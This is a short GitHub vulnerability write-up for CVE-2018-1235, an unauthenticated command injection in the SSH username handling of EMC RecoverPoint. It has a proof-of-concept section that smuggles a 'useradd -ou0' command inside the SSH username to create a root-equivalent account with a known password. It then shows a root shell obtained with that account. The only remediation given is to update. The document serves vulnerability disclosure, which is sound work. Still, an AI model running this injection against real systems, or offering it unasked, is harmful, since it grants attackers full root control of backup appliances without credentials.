Skip to content

Latest commit

 

History

History
35 lines (28 loc) · 1.32 KB

EMC_RPT_CVE-2018-1235-remote.md

File metadata and controls

35 lines (28 loc) · 1.32 KB

EMC RecoverPoint < 5.1.2/5.1.1.3 username command injection (remote root exploit)

1. Description

An OS command injection vulnerability exists in the mechanism which processes usernames which are presented for authentication, allowing unauthenticated root access via the ssh service.

2. Proof of Concept

  • Inject into ssh username.
$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
Password: ^C
$ ssh bao7uo@192.168.57.3
Password: Secret123
Could not chdir to home directory /home/bao7uo: No such file or directory
root@recoverpoint:/# id
uid=0(root) gid=0(root) groups=0(root)
root@recoverpoint:/#
  • N.B. combined length of new username+password is limited to 21 due to injection length limitations

3. Solution:

Update to latest version of RecoverPoint